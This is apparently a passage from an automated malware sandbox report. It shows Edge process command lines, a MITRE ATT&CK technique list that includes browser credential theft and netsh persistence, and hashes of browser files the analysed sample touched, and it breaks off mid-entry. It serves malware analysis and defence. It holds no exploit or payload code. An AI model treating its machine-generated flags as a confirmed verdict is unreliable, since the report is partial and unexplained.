  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7316 /prefetch:1
  2⤵
  PID:5072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
  2⤵
  PID:4548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
  2⤵
  PID:5380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7708 /prefetch:1
  2⤵
  PID:2560
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:1
  2⤵
  PID:5440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,12995203737427030598,18070308282257369844,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6944 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5508

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5140

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Phishing

T1566

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
8f33275078b77e641c049e3aee9816a4

SHA1
dcd69768ce2341a4cbb0bf30660ee3ba9e1de2d0

SHA256
6792bcb7871b931f6404826588ce2f2a176d463e8ae8892314baf40311f28d5c

SHA512
6b1f1a7f21654f8662c2b4262dd3968ca8ad5408051e052b297270edd3b440d945d9fc3f7cb100ec2078a9a837ed380cab05b34cf741dfe627b042977cdb17d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0504c0d0b9c007a767de8a404f2ec484

SHA1
73b1066ce283079341bc94a3e5c65535f0523145

SHA256
3469f4679beea250ce59f3fa4721e48f81587735f44e0fa2b70638b78dbf8a2d

SHA512
c6c0c6edbaab3b92832c4140916e99ca6725b79e5d3a43ad59ebd94a567458ef79923e2236b43344ecb6fd75442d0c7779b024edbd1bf9035a2a86ba7e5ce606

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
50236cd957789ed0d1b6564c7f0ecfae

SHA1
4c9e4dac57ab9ffb5bc55154d6ff89f1e6c1d5f4

SHA256
5820467c07d06249a1462b7c9deeb0801a8a6475ea19637397b9bbbc95f90fcd

SHA512
1cbf4be5224fecf811bf81361d6d282810de016194b17e2002d510287d384048272215b813838912eebcdddb1f657ade0aa3c122871c9d636b6a8fa8e74535d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
38KB

MD5
adf2df4a8072227a229a3f8cf81dc9df

SHA1
48b588df27e0a83fa3c56d97d68700170a58bd36

SHA256
2fd56ac4d62fec83843c83054e5548834a19001c077cdb224901237f2e2c0e4c

SHA512
d18ffc9a41157ea96014a503640b3a2a3931f578293e88cc05aa61c8223221d948c05637875d8e3ee5847b6a99341ea22b6a1aee67c170e27bde5e154cf1b9ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
20KB

MD5
d8e280973cc708c5ab15f393bc63396a

SHA1
e5ed496d8bcd7b16832c2412f5610de426529ce8

SHA256
95498d8a14b76949c4c3adc70aa7e5583e2f57ad2c0a49e6b631aff2d9a3cd06

SHA512
7b62d75d904710845244f8707e7e15f3f98dac46a2dea848c69080d2bc24d137ea136f3b03c22605cc46e66e3ef40c8562f19a0a2002379c5012111f767ce773

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
37KB

MD5
9fc4f3c0ec97d39f8a936972c9caed48

SHA1
a9546ee2354cdff39f10fb32cc9495745c14a875

SHA256
9e86376f729620fd1970d3931cba62626108e41f6962e6b84a13bd8c0bd641b5

SHA512
6e1cd676423da9bc7aa523ab56b45f0343721bcd859fb0e7b0061ff940f27a5db6119e5dde37d397e189177ab80444d38091a31d0e6c354840d083bf1bbf8445

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
21KB

MD5
d141a6f6f1f714737b9121b00fc34f8c

SHA1
a151b8ae9b99e23d2a264e97f38e0fcce2e9ba4b

SHA256
e83fabb2fb694dcd82143d1f67e23b46caf85a50fef6c178d9ea38a0809f4e3c

SHA512
b2d7a92848a9aefb245783ea0d142d3fe987b551eaee0e37f68070775dfc35866c295702da092fbf266a273755036228f26cf6090414e2325fdc2d06047e5f13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
26KB

MD5
525579bebb76f28a5731e8606e80014c

SHA1
73b822370d96e8420a4cdeef1c40ed78a847d8b4

SHA256
f38998984e6b19271846322441f439e231836622e746a2f6577a8848e5eed503

SHA512
18219147fca7306220b6e8231ff85ebeb409c5cc512adff65c04437d0f99582751ccb24b531bbedf21f981c6955c044074a4405702c3a4fae3b9bf435018cc1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

Filesize
18KB

MD5
8eb86590ca5b589e6d3f5e70463e320b

SHA1
0ea23b0afdb96b7841dcdc3ae7b670603cccbd4d

SHA256
fa6110d56d214ae00a4c1b32499ada72a82777f59bc7b5e8cb4851a9d2ef56e4

SHA512
aab24f0b1a810de82251a11d6f22a593354c09387b3667185e6caa726b414885a3bd4f1bfec7166bf63d9e092184f5a6fefabfc9edf1e4b849f57699e20ad9f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
18KB

MD5
8bd66dfc42a1353c5e996cd88dc1501f

SHA1
dc779a25ab37913f3198eb6f8c4d89e2a05635a6

SHA256
ef8772f5b2cf54057e1cfb7cb2e61f09cbd20db5ee307133caf517831a5df839

SHA512
203a46b2d09da788614b86480d81769011c7d42e833fa33a19e99c86a987a3bd8755b89906b9fd0497a80a5cf27f1c5e795a66fe3d1c4a921667ec745ccf22f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

Filesize
59KB

MD5
25b3d7b6beb44eb20ffd065656c15e1d

SHA1
59301a1a36a144715b51bdccde1eb2a328f7efd3

SHA256
00a88a411e1a1ba98f55fae99469271160c23d87b1f71f90f31a7810f063db9d

SHA512
8c71c4b268832f016dc20f68611abe976294421217f7834b5d409b53b0f0b137231c9364eaa84eb1afb05fbb121a0ebd263e52ba60cda157ae892219b462e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

Filesize
16KB

MD5
dde035d148d344c412bd7ba8016cf9c6

SHA1
fb923138d1cde1f7876d03ca9d30d1accbcf6f34

SHA256
bcff459088f46809fba3c1d46ee97b79675c44f589293d1d661192cf41c05da9

SHA512
87843b8eb37be13e746eb05583441cb4a6e16c3d199788c457672e29fdadc501fc25245095b73cf7712e611f5ff40b37e27fca5ec3fa9eb26d94c546af8b2bc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

Filesize
43KB

MD5
b4b019ac387847c390d6eeb507c8e2ea

SHA1
8ea1be33b8ccd14d9092c5365b92f740a223ec32

SHA256
d4bd3467352a25884b3bcf5815917bdf5a94988b8b6ad014558aba1f546e84c9

SHA512
3baf9676c155b238206e4e3cee2b2b099a923e58b3a3726aaba22037a123e64611be2dac012e73dea9e4ada7e66776b26089c73e4855fb28c0cbd38c0c192fea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

Filesize
55KB

MD5
c649e6cc75cd77864686cfd918842a19

SHA1
86ee00041481009c794cd3ae0e8784df6432e5ec

SHA256
f451a4a37826390ab4ea966706292ee7dd41039d1bedc882cbc8392734535393

SHA512
e9e779870071fe309bbde9b6a278d9627c7f2402b55ac4c0a48c65b1de5172cf9dad2992f8619d7e7aaf978e6ccd607620de88554aa963f3d45501913ed49f64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

Filesize
87KB

MD5
65b0f915e780d51aa0bca6313a034f32

SHA1
3dd3659cfd5d3fe3adc95e447a0d23c214a3f580

SHA256
27f0d8282b7347ae6cd6d5a980d70020b68cace0fbe53ad32048f314a86d4f16

SHA512
e5af841fd4266710d181a114a10585428c1572eb0cd4538be765f9f76019a1f3ea20e594a7ee384d219a30a1d958c482f5b1920551235941eec1bcacd01e4b6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

Filesize
16KB

MD5
686cd4e029335cb803ea8b47ea727bd5

SHA1
acb03acb24c943d81a8e4822466201cc4114692c

SHA256
785ffc242cb18f8e9ccb9ab96c37df3cdf1612a38a325a2a9bcf8164eac6488d

SHA512
a54e055ca8e021757102aa6c7f9045959fa32a7db215595cda8419ac96f75f44e1f5846037e14b6a20d0db51c4b1e974aff1718e16ff5d7650e0b667ca09721c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

Filesize
108KB

MD5
d78913ec94c74c8f7b9917ea8d8e7c5f

SHA1
b75dc5cf1fbcd90c59adaeb0a66bed203fa17a46

SHA256
0fc8cd712751d7f0704be9138524456fb825a6beb4f13e08ff5feec14b482d86

SHA512
d17d858361f6e763c2b473fd1271a1cc605d546e456e428f90e0bfd649ba3da38c7097953064fc4e03b5349b4c8804b84fb2425cf4a62b9950e7be9f1bab123d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

Filesize
21KB

MD5
dc0ea8e8dabeb66f73e00129c96398c9

SHA1
384840cfa2298a7e0bfd9dfe3de3a4b4c455182e

SHA256
c360235e3fb5d941ef8524352a835ad2b02a4686648cc684a1388c71a5e6000f

SHA512
5b2f05d90c0a607e35d80068e1e48d5b3e37a68e5d628f6e29e82dbb98fa3088894c650f0db182a6d51903cb2f97df216bfd83d5163d2539f35780c019dadb1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013

Filesize
66KB

MD5
2540086b252f77344a44b8db4a5bae8c

SHA1
4738292a264a974b068b3b2793c8dfe97beac302

SHA256
07995fd861ffeb9f7d02db36115eb3d66d9014e9049d74ad46e8db4761873af6

SHA512
47ca53102e89294f9494dcd079e30f94eea9b50fef3554a5b4cdb261ab06ca1bf936853c9cfb35e7e5da9d7b440b1864152117085a737433dad578d5bb317c91

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000041

Filesize
27KB

MD5
743438659d31b895fc9cf7c69a7832c0

SHA1
452d607d73e5643df11e522344f36b253d5de8a1

SHA256
c0b509b9923c00a730ea44bc839574fb609e771fe18724935a463f769071eea9

SHA512
11a1cfea0521b670e370787d153bb5eeaf17b7cbe112a5a55b3cc2e41fe575f0711e306f73b11be41b184e3f459e1404deb956903daabf33597d1550e0f7d079

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
5KB

MD5
d42793622bb7884eaaa8ab1af54664eb

SHA1
b5f6ce0c1be3c2a577bad6562d2b9e3dd5a6b475

SHA256
35973afac20ac3328f03eb129918d8e95986094a08ef93f0ab5c62f3a80233cf

SHA512
413e67fbde2d14194c6684de7bff766ce3de789e14efc93465cbbf9c317e239324442d2438325c5eb5f68e6caed5016f5177be50c5e9cb554202eef6659e5747

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
6b30ceabf7f5339d482071ee12ba291d

SHA1
3c57f85a519737046e65e101cd3e222c8e1f0e84

SHA256
e6d6f30cfef3a382f3e664e89ae43c293640cb9e3ec4dbbba9063c2bd2904e71

SHA512
2ecdd979bf1044f08700a82dafdb0b65ce86bc3e091eb82cb954677c79845fa99faacae67fd49a623d0452a7b329127842390e1dc23aff0658a4c804043adb2e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
99868842cde79096e10eef26f19f60d5

SHA1
1eecad580bd56ad22eabc22aa2a68a8311fd9c62

SHA256
678c464b084b9953ef9f74b08075affa204337d0b08c072b6f487db1f39fc776

SHA512
0c19ecd353409e1390bee1c237a33c73457c2492a597bc2e4e6bdc3423955f1e92bbf695771b7150ffe7e1bb3edb067e6859541e4080dec0baaa66ca0ab60b03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
9645de62f1e4d1c5cc3f596909fac01a

SHA1
904543c7f8894306038655102639f3d81f0bb520

SHA256
d52ecea7ce4e73d73999c7febe78b997561c9803c2ed822b063c4090115966c7

SHA512
24de21ee69fd35d80873c930077a39b6a9cd272e116731b1f36c26755f20b347864d845b05712ba2f3f70c949afc98e05c9d7fa262e10f2c81e5450946774ff6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
d59e21a14c4a9653cef28583c1d3207f

SHA1
ac5f4a68396f2a2053668fdeaac9f982cc464cee

SHA256
e8cddc0c27c34b949c2169a5accc127e536c9597bec101b6e31d7a90933afafb

SHA512
7b3aebf9f4c01da1729cd4c7d8fd3e3a6fe52b3a415a2b41c8f35926699916b9bd088ab314c8e2aba95db58bb93013ea469ebbacda8f5de633946e556e00ad98

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
36640c331515785709b8ed0dfad43876

SHA1
510fc34b16f526e2566c1d0dcc938140a19a1392

SHA256
7742c7479902bc8da7947729951b39c6000260ba6b509756941b30454e122c31

SHA512
a3eec002e75645975e8986ccc55334219665adb563a4d50b906810584831ca06916790fc76a989654d168f8bf472f7daf88a01e6ab7e1dcfbc9b7e8b3d74b4ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
15KB

MD5
6bd2d9c0c7558324bfb7ef3fb719c7b5

SHA1
ae706b09bda72fc9cc1b1e09c4f34ba076c16bc2

SHA256
5b78456fc3bbcded1bdfa5cbc64ef845c67a61b103d086d234d7e7b5f8b58f6b

SHA512
8450b6c657383fd1947565032a139e704e0e042e4bc8cd2c7a44798dacf5292087e264c4ebfad7164465b496add0ed4793abaaa75132a8949d89f086690a3cce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
74e8fb5d6c187ef30a556c0eebbd9937

SHA1
821e391dfcd7b7335a16c21874cd1be745e38ff4

SHA256
df444b062b5faa71277dc96127085e8dc7044f17e7626f649326703e905358cc

SHA512
f963e45230a8387291bea67822e331b9e06ee0cb1e2b26b3b1fa582c96bc448bc760538b15ae474d504e8683a2515482655563d95ffd95a52ab3cbfa56dd2008

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
c005fa509aef489c6402ab9a95e0126f

SHA1
e3d3626b067b4c4c61cd6d8e9b41fc223ed328f6

SHA256
4533fababf7551e4d2051500f1dadc039b13ba032e0edd30a3cafac04a117f19

SHA512
ed6788f563fecf582bc89fa95c3ad5b723c7bc4440489d267d227a5b35daf415939bb9e39352b3532ef3a04350a3b89d92d9d1de1ed7c05802641f3025972e15

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
e51e70eae54145c78d4e7e3a9493f019

SHA1
2942ab10a72fd133284bde13eed20aaa688e5dbc

SHA256
5f751a4214a1d132f7113a9dcd13e1b31f8a6eb084084b4f019d759c6d0b44fc

SHA512
8ae4832c46f2fb87edff8764a062d27014c9334a19486a655d885c7487cc0a26bfcfcb38ca40e5234a0ae9c77a5188e4504c83f64648f5a0c81e0ebc963c4f70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
108c8ee106a54d25e2a0c39c071189c3

SHA1
1ff610759e8ad3555d8bd0c8d1e261a4152297ed

SHA256
92d489678c3e403658c656933e1c19d6b28eaa50adc87b15b291246063e28c03

SHA512
4446058ceb061efced003e87ade843b7e39326022c56e1506535fd787d95b156beaa55978e0f7bcbd8775b65c9b0f0a840e59b742d5fb86dc78838082f6d0db0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
11KB

MD5
03d158950ca907ffccf30c9e64470bed

SHA1
7ab1c118b178ec9a299434fcccc7b3f7e849882f

SHA256
911b16184b2590817a422050abc4450fb8ba2ca28c117b3938a838f439728f4a

SHA512
f8b479afd7cabf7187e92fe17583535c4304ac63f5dc0784c527234508ced393e01b39ba511644ac8c78ff8db9a8c048ddc14a38fa0ea5261258e29221e89b6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
12KB

MD5
8fb4c869ed286fe7a4f5bb6a3bead70a

SHA1
6978a5511ace19e3c0e2f8da9f147328955961d7

SHA256
9808b630bed590e11f9fe00453afa90dc5754f63220e96901de580642bdb2079

SHA512
30ffe202cb9d21793742e7b2b3158760b130591a64a22f3a63b6d8865f5f6bb4a1ee77ecd115c43682f4476c6dd042474e2be50a788f46ccbd8b4f017eae7ffc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
8729df162b1d169fff8c84fc30b067c2

SHA1
18af0ff07fb467b3a1a3655679dcb15703e7237c

SHA256
402122037f020ea9441e45f4dba22084b48b45dfad7c95d33accd803022f8f61

SHA512
20fe41f1d116f76ed2a86e4aaaed198b57208900b163fc3b4a5a66ae6ad507d69dcf30bf8e5e9c9aafaedbf36c7bb898d47b4c58c60732d8b9c9ac21246f5a8b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
261bb6e74a697f296197d54b7b1b8ed0

SHA1
dd70a75a890cb0a4ff28442af3b3c67b13c09ce4

SHA256
4141a4d5e04892138d4aef296e66df54b1afcc80a924cb5c868cfbaf5c4ad9d1

SHA512
90d59a2efc46ea5b5a1365a964df6c2b7d364b8f84a2aafc978d0c740f8bbc0cfe31e31400d0b578a964fb8de9f33fe6aaf78c980e01fa2120cda3ad2a1ff29b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
6c6caeb5d1c73bba3e8b7b686f43dc26

SHA1
cad7efdd914e4d99b7a4316144b55d5fdf5b1290

SHA256
bcd9ba85fdb29fcec73128db661462d29c6f562f8c3a56a99f4cb23b7a2cc838

SHA512
557e35a358fe3954db9ddf06b1e7f276a828c5d615a4f4f1d78b44bb7e08b83de66897a3653328ff5012593193933652a1c06d2a05b08e4d557eb248b1358cb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
161dbe86d7830ab5ec15e973f38657eb

SHA1
7892644ee7bc2e939336495dbf466cafa7a51771

SHA256
74a62a33fb58766820892b71e3b83cef3df3f8f873b88495598901b4adf14147

SHA512
64c2107ebce286bd5f09ed072231e817fa3862bb5e4b4d5216876580ae75db397b943cf6bb97fb61dda588f49ddaf645b1fcde0e0ece8f99e24dcbf425b28717

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
ad1bf499ddbf5334bdf9d328e8307edf

SHA1
a85f656c51e9c0df5410634d04f9704aa239ab76

SHA256
09212b40c8a1b20c4c3f6d39503e0e2bf5bb3657df006d22f7ac3d34dcc270e4

SHA512
6fa6d9e56a9016a54fb2409388b363ec138f5ed5ebfc6c7b7245dd3e91939ee6a9d4a2abcf8bae2d7ffc47d33173c0375a9115e1cf6f6a2261277893693947e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
741e620826be4e3511cd0d92ae685a98

SHA1
6092ca101a92730413ec9d976fefe74d75ea24bf

SHA256
4e56f90ea3958d15b03e2cc4210c71f445e6021dcc55aa7d1815a9e1181d20b3

SHA512
2631c3a4b801572e10c8745e0e3238da99f25af52da8458b4385f62f779d8ffc32caca407adaae21cbca560b7697469899fca5d4fcda92e46d7d8d32a5f56774

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
b6827577bc96840b260296dca0da5ef3

SHA1
6243fa10f2491cff2dfae1dffddb8bc7d4bd126a

SHA256
2501833cc6280e754802688029c0fe2b2ddeea3f83870fae7f625388aad7dbd8

SHA512
973f98f1f2a4ed45927c2578dca55197128a57374f695094c040d7964ea50140d659e3f3ccf1a235ade41f7251bcfa523480ea808ebcb6e9d1176e9c4dd20138

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
c4e382e3729011e73f898361a6c85e68

SHA1
1732bae7801f4c69d1a71f2fea6e3f1986fd6152

SHA256
3663a620251d30303a935d8fa8e8f7a1b744a6ba5d4a1f597e154f5243912b5a

SHA512
ea568721823bc4af88ba4879a7dfb953a4dca52e1dd53d59ac0227652d40144b3f5823d61826b78cb9ea336320aff67e1748f2ab20a46ba0f882e4ac31e839a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
81fe1ec3ad8705385d1daf8e9f8a06d1

SHA1
c9e41fa6aa2d79d97b1e673d4179d77f7df219af

SHA256
f788b89f612ede0ce0b0c7a818ce287b39821d59f66e80b5b3a1efcb2d952c01

SHA512
ca8f5e1476c7ae14f419177cdff189f7355284d40d9784eaca122f67e968c987275c179be5e20d6665b6971bc7ded4367c0f364c4bc4bdf484201f9393413b77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
3KB

MD5
98f3c1be4b0ac8f7de5c0f2f1290dff0

SHA1
9301de3f8fa5cc8413c968757fd397a78736389e

SHA256
c4fe696095688946f0dc5a4d96031eadd64c50b0f823c78fe6c9d101e26348df

SHA512
197cf578553d65192ac269ff45f8d015706892a77608efdceffedfa70533819db529b593dd0c16f8a0dc17d0a606e1985430fde6716a4a9f1f33ab2537cb42ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
29b32df7eac7c804a9ef325be611ed3f

SHA1
39844aea64f5a53f6b9d21e24c9c5c2d289ac164

SHA256
4fc5ad4dbbd4c849ffc3d4e9e09adde09d225ba2613311946186826c7f614395

SHA512
7bfdeca8ee6ed4e64d5102593ac77e0cb5195a85e76ab00a0cc0157c77b73ccb0d55ba122b91d81f8f39f7ccc35ae753ca682a418fd4352f988ce0096a42cea7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
0d4b183551662dc3e016c99c80129aea

SHA1
fdb5972037444fae807404a7079df072c8dd6a7c

SHA256
12545c056428e49945d188c5ebcf361897dc6e39b90a38aeebbbdab1189fe18e

SHA512
80ed52e0338da0ba5c7f43ddd225b5c7b47f91930ec8300116d3eaa2d39be95555274c42210385f635a5b2f90bd327019977d3241c0d59ee1e46febe446ce248

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57d8cc.TMP

Filesize
872B

MD5
969e4763519f2497656171885875ae90

SHA1
df296e2975acc2af9e26fb47c03aae15016b6ae6

SHA256
d3377494b3c1b76d12f8edc889b2123221dea258294b8ef7a4fa87e05f899a64

SHA512
4e4eaf448b74370551b8adfe4f8fec65d70011f121f03073704aa0a91e4ae74f86ceba455ededc9b52fdd01cdbafe5044b6069e346305f8f6e443fab120619ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
5340c8a9f3c7318fde86358c87c1fdef

SHA1
44d4b71063589516e1b6a99cc1147e4577c0b0bf

SHA256
68763846c2c73dbcd74a64406acf4ee91f3aa10eda7051984833c0cfc5ec16b7

SHA512
b1af79240cb74b7ad85a7a6fee7e675badda536f16b1bbb6512d0f990cd3b8874c9f6c7a3f1e3aeb94e9d50f66e218b72d9f38996bbe9c2b98d25b4992f98846

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
2682744c8701d087a8693140de9be999

SHA1
7af6405ed27bc3fe8d9485adb5d7a641638b0e86

SHA256
fac37604ea414836536ccfc12dd0374479202b63c844478bf950f0b404665a4a

SHA512
60bf5aac92ec3f0e0f458fc832f06a72218eacd3c32fdc213d1f47780c3cfa29871046821aba6b691ac7da532071b57b59b022769794dcfce3bad8651948413b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
23c444b6930392e2ab91b1b3b3211be1

SHA1
e930a928b1d12710e97918df5cd41b001b89f2a0

SHA256
